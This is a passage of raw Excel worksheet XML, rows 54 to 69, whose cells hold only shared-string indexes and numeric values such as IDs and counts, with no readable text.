        <v>44489.0</v>
      </c>
      <c r="T54" s="48">
        <v>1.0</v>
      </c>
      <c r="U54" s="48">
        <v>1.0</v>
      </c>
      <c r="V54" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W54" s="49" t="s">
        <v>416</v>
      </c>
      <c r="X54" s="49">
        <v>5.0</v>
      </c>
      <c r="Y54" s="49">
        <v>5.0</v>
      </c>
      <c r="Z54" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA54" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB54" s="62" t="s">
        <v>417</v>
      </c>
      <c r="AC54" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD54" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE54" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF54" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG54" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="55" ht="153.75" customHeight="1">
      <c r="B55" s="42" t="s">
        <v>337</v>
      </c>
      <c r="C55" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D55" s="43" t="s">
        <v>418</v>
      </c>
      <c r="E55" s="43" t="s">
        <v>419</v>
      </c>
      <c r="F55" s="43" t="s">
        <v>420</v>
      </c>
      <c r="G55" s="43" t="s">
        <v>421</v>
      </c>
      <c r="H55" s="44" t="s">
        <v>422</v>
      </c>
      <c r="I55" s="44" t="s">
        <v>423</v>
      </c>
      <c r="J55" s="44" t="s">
        <v>424</v>
      </c>
      <c r="K55" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L55" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M55" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N55" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O55" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P55" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q55" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R55" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S55" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T55" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U55" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V55" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W55" s="49" t="s">
        <v>425</v>
      </c>
      <c r="X55" s="49">
        <v>4.0</v>
      </c>
      <c r="Y55" s="49">
        <v>9.0</v>
      </c>
      <c r="Z55" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA55" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB55" s="62" t="s">
        <v>426</v>
      </c>
      <c r="AC55" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD55" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE55" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF55" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG55" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="56" ht="153.75" customHeight="1">
      <c r="B56" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C56" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D56" s="43" t="s">
        <v>428</v>
      </c>
      <c r="E56" s="43" t="s">
        <v>429</v>
      </c>
      <c r="F56" s="43" t="s">
        <v>430</v>
      </c>
      <c r="G56" s="43" t="s">
        <v>431</v>
      </c>
      <c r="H56" s="44" t="s">
        <v>168</v>
      </c>
      <c r="I56" s="44" t="s">
        <v>169</v>
      </c>
      <c r="J56" s="44" t="s">
        <v>432</v>
      </c>
      <c r="K56" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L56" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M56" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N56" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O56" s="56">
        <v>2006443.0</v>
      </c>
      <c r="P56" s="47">
        <v>1.0</v>
      </c>
      <c r="Q56" s="47">
        <v>1.0</v>
      </c>
      <c r="R56" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S56" s="48" t="s">
        <v>433</v>
      </c>
      <c r="T56" s="48">
        <v>2.0</v>
      </c>
      <c r="U56" s="48">
        <v>2.0</v>
      </c>
      <c r="V56" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W56" s="49" t="s">
        <v>434</v>
      </c>
      <c r="X56" s="49">
        <v>4.0</v>
      </c>
      <c r="Y56" s="49">
        <v>6.0</v>
      </c>
      <c r="Z56" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA56" s="61" t="s">
        <v>163</v>
      </c>
      <c r="AB56" s="62" t="s">
        <v>435</v>
      </c>
      <c r="AC56" s="62" t="s">
        <v>436</v>
      </c>
      <c r="AD56" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE56" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF56" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG56" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="57" ht="153.75" customHeight="1">
      <c r="B57" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C57" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D57" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E57" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F57" s="52" t="s">
        <v>439</v>
      </c>
      <c r="G57" s="43" t="s">
        <v>440</v>
      </c>
      <c r="H57" s="44" t="s">
        <v>441</v>
      </c>
      <c r="I57" s="44" t="s">
        <v>282</v>
      </c>
      <c r="J57" s="44" t="s">
        <v>442</v>
      </c>
      <c r="K57" s="45">
        <v>40063.0</v>
      </c>
      <c r="L57" s="45">
        <v>1.0</v>
      </c>
      <c r="M57" s="45">
        <v>92.0</v>
      </c>
      <c r="N57" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O57" s="47" t="s">
        <v>443</v>
      </c>
      <c r="P57" s="47">
        <v>2.0</v>
      </c>
      <c r="Q57" s="47">
        <v>93.0</v>
      </c>
      <c r="R57" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S57" s="48" t="s">
        <v>443</v>
      </c>
      <c r="T57" s="48">
        <v>2.0</v>
      </c>
      <c r="U57" s="48">
        <v>185.0</v>
      </c>
      <c r="V57" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W57" s="49" t="s">
        <v>444</v>
      </c>
      <c r="X57" s="49">
        <v>4.0</v>
      </c>
      <c r="Y57" s="49">
        <v>193.0</v>
      </c>
      <c r="Z57" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA57" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB57" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC57" s="62" t="s">
        <v>445</v>
      </c>
      <c r="AD57" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE57" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF57" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG57" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="58" ht="163.5" customHeight="1">
      <c r="B58" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C58" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D58" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E58" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F58" s="52" t="s">
        <v>446</v>
      </c>
      <c r="G58" s="43" t="s">
        <v>447</v>
      </c>
      <c r="H58" s="44" t="s">
        <v>448</v>
      </c>
      <c r="I58" s="44" t="s">
        <v>449</v>
      </c>
      <c r="J58" s="44" t="s">
        <v>450</v>
      </c>
      <c r="K58" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L58" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M58" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N58" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O58" s="47">
        <v>2100366.0</v>
      </c>
      <c r="P58" s="47">
        <v>1.0</v>
      </c>
      <c r="Q58" s="47">
        <v>42.0</v>
      </c>
      <c r="R58" s="46">
        <v>210366.0</v>
      </c>
      <c r="S58" s="48">
        <v>2100366.0</v>
      </c>
      <c r="T58" s="48">
        <v>1.0</v>
      </c>
      <c r="U58" s="48">
        <v>42.0</v>
      </c>
      <c r="V58" s="46">
        <v>2100366.0</v>
      </c>
      <c r="W58" s="49" t="s">
        <v>451</v>
      </c>
      <c r="X58" s="49">
        <v>6.0</v>
      </c>
      <c r="Y58" s="49">
        <v>125.0</v>
      </c>
      <c r="Z58" s="46" t="s">
        <v>452</v>
      </c>
      <c r="AA58" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB58" s="62" t="s">
        <v>355</v>
      </c>
      <c r="AC58" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD58" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE58" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF58" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG58" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="59" ht="153.75" customHeight="1">
      <c r="B59" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C59" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D59" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E59" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F59" s="52" t="s">
        <v>453</v>
      </c>
      <c r="G59" s="43" t="s">
        <v>454</v>
      </c>
      <c r="H59" s="44" t="s">
        <v>455</v>
      </c>
      <c r="I59" s="44" t="s">
        <v>456</v>
      </c>
      <c r="J59" s="44" t="s">
        <v>457</v>
      </c>
      <c r="K59" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L59" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M59" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N59" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O59" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P59" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q59" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R59" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S59" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T59" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U59" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V59" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W59" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X59" s="49">
        <v>2.0</v>
      </c>
      <c r="Y59" s="49">
        <v>4.0</v>
      </c>
      <c r="Z59" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA59" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB59" s="62" t="s">
        <v>458</v>
      </c>
      <c r="AC59" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD59" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE59" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF59" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG59" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="60" ht="153.75" customHeight="1">
      <c r="B60" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C60" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D60" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E60" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F60" s="52" t="s">
        <v>439</v>
      </c>
      <c r="G60" s="43" t="s">
        <v>440</v>
      </c>
      <c r="H60" s="44" t="s">
        <v>459</v>
      </c>
      <c r="I60" s="44" t="s">
        <v>460</v>
      </c>
      <c r="J60" s="44" t="s">
        <v>461</v>
      </c>
      <c r="K60" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L60" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M60" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N60" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O60" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P60" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q60" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R60" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S60" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T60" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U60" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V60" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W60" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X60" s="49">
        <v>2.0</v>
      </c>
      <c r="Y60" s="49">
        <v>10.0</v>
      </c>
      <c r="Z60" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA60" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB60" s="62" t="s">
        <v>462</v>
      </c>
      <c r="AC60" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD60" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE60" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF60" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG60" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="61" ht="153.75" customHeight="1">
      <c r="B61" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C61" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D61" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E61" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F61" s="52" t="s">
        <v>439</v>
      </c>
      <c r="G61" s="43" t="s">
        <v>440</v>
      </c>
      <c r="H61" s="44" t="s">
        <v>463</v>
      </c>
      <c r="I61" s="44" t="s">
        <v>460</v>
      </c>
      <c r="J61" s="44" t="s">
        <v>464</v>
      </c>
      <c r="K61" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L61" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M61" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N61" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O61" s="56">
        <v>2001579.0</v>
      </c>
      <c r="P61" s="47">
        <v>1.0</v>
      </c>
      <c r="Q61" s="47">
        <v>1.0</v>
      </c>
      <c r="R61" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S61" s="57">
        <v>2001579.0</v>
      </c>
      <c r="T61" s="48">
        <v>1.0</v>
      </c>
      <c r="U61" s="48">
        <v>1.0</v>
      </c>
      <c r="V61" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W61" s="49" t="s">
        <v>465</v>
      </c>
      <c r="X61" s="49">
        <v>5.0</v>
      </c>
      <c r="Y61" s="49">
        <v>116126.0</v>
      </c>
      <c r="Z61" s="46" t="s">
        <v>222</v>
      </c>
      <c r="AA61" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB61" s="62" t="s">
        <v>466</v>
      </c>
      <c r="AC61" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD61" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE61" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF61" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG61" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="62" ht="153.75" customHeight="1">
      <c r="B62" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C62" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D62" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E62" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F62" s="52" t="s">
        <v>453</v>
      </c>
      <c r="G62" s="43" t="s">
        <v>454</v>
      </c>
      <c r="H62" s="44" t="s">
        <v>467</v>
      </c>
      <c r="I62" s="44" t="s">
        <v>468</v>
      </c>
      <c r="J62" s="44" t="s">
        <v>469</v>
      </c>
      <c r="K62" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L62" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M62" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N62" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O62" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P62" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q62" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R62" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S62" s="48" t="s">
        <v>307</v>
      </c>
      <c r="T62" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U62" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V62" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W62" s="49" t="s">
        <v>360</v>
      </c>
      <c r="X62" s="49">
        <v>3.0</v>
      </c>
      <c r="Y62" s="49">
        <v>72.0</v>
      </c>
      <c r="Z62" s="46" t="s">
        <v>222</v>
      </c>
      <c r="AA62" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB62" s="62" t="s">
        <v>470</v>
      </c>
      <c r="AC62" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD62" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE62" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF62" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG62" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="63" ht="153.75" customHeight="1">
      <c r="B63" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C63" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D63" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E63" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F63" s="52" t="s">
        <v>453</v>
      </c>
      <c r="G63" s="43" t="s">
        <v>454</v>
      </c>
      <c r="H63" s="44" t="s">
        <v>471</v>
      </c>
      <c r="I63" s="44" t="s">
        <v>460</v>
      </c>
      <c r="J63" s="44" t="s">
        <v>472</v>
      </c>
      <c r="K63" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L63" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M63" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N63" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O63" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P63" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q63" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R63" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S63" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T63" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U63" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V63" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W63" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X63" s="49">
        <v>2.0</v>
      </c>
      <c r="Y63" s="49">
        <v>4.0</v>
      </c>
      <c r="Z63" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA63" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB63" s="62" t="s">
        <v>473</v>
      </c>
      <c r="AC63" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD63" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE63" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF63" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG63" s="63" t="s">
        <v>474</v>
      </c>
    </row>
    <row r="64" ht="153.75" customHeight="1">
      <c r="B64" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C64" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D64" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E64" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F64" s="52" t="s">
        <v>453</v>
      </c>
      <c r="G64" s="43" t="s">
        <v>454</v>
      </c>
      <c r="H64" s="44" t="s">
        <v>475</v>
      </c>
      <c r="I64" s="44" t="s">
        <v>476</v>
      </c>
      <c r="J64" s="44" t="s">
        <v>477</v>
      </c>
      <c r="K64" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L64" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M64" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N64" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O64" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P64" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q64" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R64" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S64" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T64" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U64" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V64" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W64" s="49">
        <v>2002749.2002752</v>
      </c>
      <c r="X64" s="49">
        <v>2.0</v>
      </c>
      <c r="Y64" s="49">
        <v>27.0</v>
      </c>
      <c r="Z64" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA64" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB64" s="62" t="s">
        <v>478</v>
      </c>
      <c r="AC64" s="62" t="s">
        <v>479</v>
      </c>
      <c r="AD64" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE64" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF64" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG64" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="65" ht="153.75" customHeight="1">
      <c r="B65" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C65" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D65" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E65" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F65" s="52" t="s">
        <v>453</v>
      </c>
      <c r="G65" s="43" t="s">
        <v>454</v>
      </c>
      <c r="H65" s="44" t="s">
        <v>480</v>
      </c>
      <c r="I65" s="44" t="s">
        <v>481</v>
      </c>
      <c r="J65" s="44" t="s">
        <v>482</v>
      </c>
      <c r="K65" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L65" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M65" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N65" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O65" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P65" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q65" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R65" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S65" s="57">
        <v>15578.0</v>
      </c>
      <c r="T65" s="48">
        <v>1.0</v>
      </c>
      <c r="U65" s="48">
        <v>4822.0</v>
      </c>
      <c r="V65" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W65" s="49" t="s">
        <v>483</v>
      </c>
      <c r="X65" s="49">
        <v>3.0</v>
      </c>
      <c r="Y65" s="49">
        <v>4843.0</v>
      </c>
      <c r="Z65" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA65" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB65" s="62" t="s">
        <v>484</v>
      </c>
      <c r="AC65" s="62" t="s">
        <v>485</v>
      </c>
      <c r="AD65" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE65" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF65" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG65" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="66" ht="153.75" customHeight="1">
      <c r="B66" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C66" s="43" t="s">
        <v>486</v>
      </c>
      <c r="D66" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E66" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F66" s="52" t="s">
        <v>487</v>
      </c>
      <c r="G66" s="43" t="s">
        <v>488</v>
      </c>
      <c r="H66" s="44" t="s">
        <v>441</v>
      </c>
      <c r="I66" s="44" t="s">
        <v>489</v>
      </c>
      <c r="J66" s="44" t="s">
        <v>490</v>
      </c>
      <c r="K66" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L66" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M66" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N66" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O66" s="47">
        <v>2012801.0</v>
      </c>
      <c r="P66" s="47">
        <v>1.0</v>
      </c>
      <c r="Q66" s="47">
        <v>39958.0</v>
      </c>
      <c r="R66" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S66" s="48">
        <v>2012801.0</v>
      </c>
      <c r="T66" s="48">
        <v>1.0</v>
      </c>
      <c r="U66" s="48">
        <v>39958.0</v>
      </c>
      <c r="V66" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W66" s="49" t="s">
        <v>491</v>
      </c>
      <c r="X66" s="49">
        <v>6.0</v>
      </c>
      <c r="Y66" s="49">
        <v>46208.0</v>
      </c>
      <c r="Z66" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA66" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB66" s="62" t="s">
        <v>492</v>
      </c>
      <c r="AC66" s="62" t="s">
        <v>493</v>
      </c>
      <c r="AD66" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE66" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF66" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG66" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="67" ht="153.75" customHeight="1">
      <c r="B67" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C67" s="43" t="s">
        <v>486</v>
      </c>
      <c r="D67" s="43" t="s">
        <v>437</v>
      </c>
      <c r="E67" s="43" t="s">
        <v>438</v>
      </c>
      <c r="F67" s="52" t="s">
        <v>487</v>
      </c>
      <c r="G67" s="43" t="s">
        <v>488</v>
      </c>
      <c r="H67" s="44" t="s">
        <v>441</v>
      </c>
      <c r="I67" s="44" t="s">
        <v>494</v>
      </c>
      <c r="J67" s="44" t="s">
        <v>495</v>
      </c>
      <c r="K67" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L67" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M67" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N67" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O67" s="47">
        <v>2016897.0</v>
      </c>
      <c r="P67" s="47">
        <v>1.0</v>
      </c>
      <c r="Q67" s="47">
        <v>1.0</v>
      </c>
      <c r="R67" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S67" s="48">
        <v>2016897.0</v>
      </c>
      <c r="T67" s="48">
        <v>1.0</v>
      </c>
      <c r="U67" s="48">
        <v>1.0</v>
      </c>
      <c r="V67" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W67" s="49" t="s">
        <v>496</v>
      </c>
      <c r="X67" s="49">
        <v>3.0</v>
      </c>
      <c r="Y67" s="49">
        <v>16.0</v>
      </c>
      <c r="Z67" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA67" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB67" s="62" t="s">
        <v>492</v>
      </c>
      <c r="AC67" s="62" t="s">
        <v>497</v>
      </c>
      <c r="AD67" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE67" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF67" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG67" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="68" ht="153.75" customHeight="1">
      <c r="B68" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C68" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D68" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E68" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F68" s="52" t="s">
        <v>500</v>
      </c>
      <c r="G68" s="43" t="s">
        <v>501</v>
      </c>
      <c r="H68" s="44" t="s">
        <v>502</v>
      </c>
      <c r="I68" s="44" t="s">
        <v>503</v>
      </c>
      <c r="J68" s="44" t="s">
        <v>504</v>
      </c>
      <c r="K68" s="45">
        <v>1917.0</v>
      </c>
      <c r="L68" s="45">
        <v>1.0</v>
      </c>
      <c r="M68" s="45">
        <v>8.0</v>
      </c>
      <c r="N68" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O68" s="47">
        <v>1917.0</v>
      </c>
      <c r="P68" s="47">
        <v>1.0</v>
      </c>
      <c r="Q68" s="47">
        <v>8.0</v>
      </c>
      <c r="R68" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S68" s="48">
        <v>1917.0</v>
      </c>
      <c r="T68" s="48">
        <v>1.0</v>
      </c>
      <c r="U68" s="48">
        <v>16.0</v>
      </c>
      <c r="V68" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W68" s="49" t="s">
        <v>505</v>
      </c>
      <c r="X68" s="49">
        <v>5.0</v>
      </c>
      <c r="Y68" s="49">
        <v>21884.0</v>
      </c>
      <c r="Z68" s="46" t="s">
        <v>506</v>
      </c>
      <c r="AA68" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB68" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC68" s="62" t="s">
        <v>507</v>
      </c>
      <c r="AD68" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE68" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF68" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG68" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="69" ht="153.75" customHeight="1">
      <c r="B69" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C69" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D69" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E69" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F69" s="52" t="s">
        <v>500</v>
      </c>
      <c r="G69" s="43" t="s">
        <v>501</v>
      </c>
      <c r="H69" s="44" t="s">
        <v>508</v>
      </c>
      <c r="I69" s="44" t="s">
